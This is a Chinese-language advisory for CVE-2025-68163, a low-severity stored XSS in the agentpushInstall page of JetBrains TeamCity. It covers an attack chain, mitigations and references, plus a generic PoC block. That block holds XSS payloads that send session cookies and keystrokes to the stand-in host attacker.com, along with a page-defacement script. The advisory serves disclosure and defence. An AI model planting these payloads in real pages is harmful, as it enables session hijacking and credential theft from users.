CVE-2025-68163: JetBrains TeamCity agentpushInstall页面存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-68163

漏洞类型

存储型XSS

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

JetBrains TeamCity

漏洞概述

CVE-2025-68163是JetBrains TeamCity中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞出现在TeamCity的agentpushInstall页面，攻击者可以在该页面注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，所有访问该页面的用户都会受到攻击影响。此漏洞的CVSS评分为3.5，属于低危级别。漏洞需要攻击者具备高权限（PR:H）才能实施利用，并且需要用户交互（UI:R）才能触发。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户、执行未经授权的操作，或者在用户浏览器中执行任意JavaScript代码。TeamCity是一款流行的持续集成和持续部署（CI/CD）服务器，被广泛应用于软件开发和DevOps流程中，因此该漏洞可能对使用TeamCity的企业和组织的安全造成潜在威胁。建议受影响的用户尽快升级到修复版本或采取临时缓解措施。

技术细节

该漏洞是存储型XSS（Cross-Site Scripting）类型的安全问题，存在于JetBrains TeamCity的agentpushInstall页面。存储型XSS与反射型XSS的主要区别在于，恶意脚本会被永久存储在目标服务器上（如数据库、论坛帖子、评论区等），而不是通过URL参数等方式临时传递。当其他用户访问包含恶意内容的页面时，服务器从存储中读取数据并将其嵌入到响应页面中，从而触发恶意脚本执行。在TeamCity的这个漏洞中，攻击者通过agentpushInstall页面注入包含恶意JavaScript代码的内容。这些内容被存储在TeamCity服务器端后，任何访问该页面的用户都会在不知情的情况下执行攻击者植入的脚本。由于TeamCity通常具有较高的权限访问权限，攻击成功可能导致敏感信息泄露、凭据窃取或进一步的横向移动。攻击者需要具有高权限账户才能利用此漏洞，这降低了漏洞被利用的风险，但不应忽视其潜在危害。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标TeamCity服务器版本，确认版本低于2025.11，并定位agentpushInstall页面

STEP 2

权限获取

攻击者需要获取TeamCity的高权限账户（如管理员或具有agent管理权限的用户）

STEP 3

恶意代码注入

攻击者访问agentpushInstall页面，在输入字段中注入包含恶意JavaScript代码的payload

STEP 4

数据持久化

恶意代码被TeamCity服务器存储到数据库或配置中，实现持久化

STEP 5

诱导受害者

攻击者诱使其他用户（如开发人员、运维人员）访问被污染的agentpushInstall页面

STEP 6

脚本执行

当受害者访问页面时，服务器从存储中读取恶意代码并嵌入到响应页面中，浏览器执行恶意脚本

STEP 7

数据窃取/攻击完成

攻击者通过恶意脚本窃取受害者的会话cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-68163 PoC - Stored XSS in JetBrains TeamCity agentpushInstall page
// This is a conceptual PoC for educational and security testing purposes only

// Step 1: Identify the vulnerable endpoint
// Target: https://<teamcity-server>/agentpushInstall

// Step 2: Inject malicious JavaScript payload
// The payload would be injected into input fields on the agentpushInstall page
const maliciousPayload = `<script>alert('XSS Vulnerability - CVE-2025-68163');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>`;

// Step 3: Example attack scenarios
// 1. Session hijacking - steal session cookies
const stealCookies = `<script>fetch('https://attacker.com/log?c='+btoa(document.cookie));</script>`;

// 2. Keylogging - capture user keystrokes
const keylogger = `<script>document.onkeypress=function(e){fetch('https://attacker.com/klog?k='+e.key);}</script>`;

// 3. DOM manipulation - modify page content
const domManipulation = `<script>document.body.innerHTML='<h1>Site Under Maintenance</h1>';</script>`;

// Step 4: Attack workflow
// - Attacker with high privileges accesses agentpushInstall page
// - Injects malicious script into vulnerable input field
// - Script is stored on the server
// - When other users visit the page, the script executes in their browser
// - Attacker can steal session tokens, credentials, or perform actions on behalf of users

console.log('CVE-2025-68163 - Stored XSS in TeamCity agentpushInstall');
console.log('Payload:', maliciousPayload);

影响范围

JetBrains TeamCity < 2025.11

防御指南

临时缓解措施

在官方修复版本发布之前，可以采取以下临时缓解措施：1）限制对agentpushInstall页面的访问权限，只允许必要的用户访问；2）在Web应用防火墙（WAF）上配置XSS防护规则，对相关请求进行过滤和拦截；3）对所有用户输入实施严格的输入验证，使用白名单机制；4）对输出到页面的所有数据进行适当的HTML编码和转义；5）启用HTTPOnly和Secure标志来保护Cookie，防止JavaScript访问；6）定期审查TeamCity服务器日志，排查异常访问行为；7）考虑暂时禁用不必要的TeamCity插件和功能，减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68163
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68163
3 Details https://www.cvedetails.com/cve/CVE-2025-68163/
4 VulDB https://vuldb.com/cve/CVE-2025-68163
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/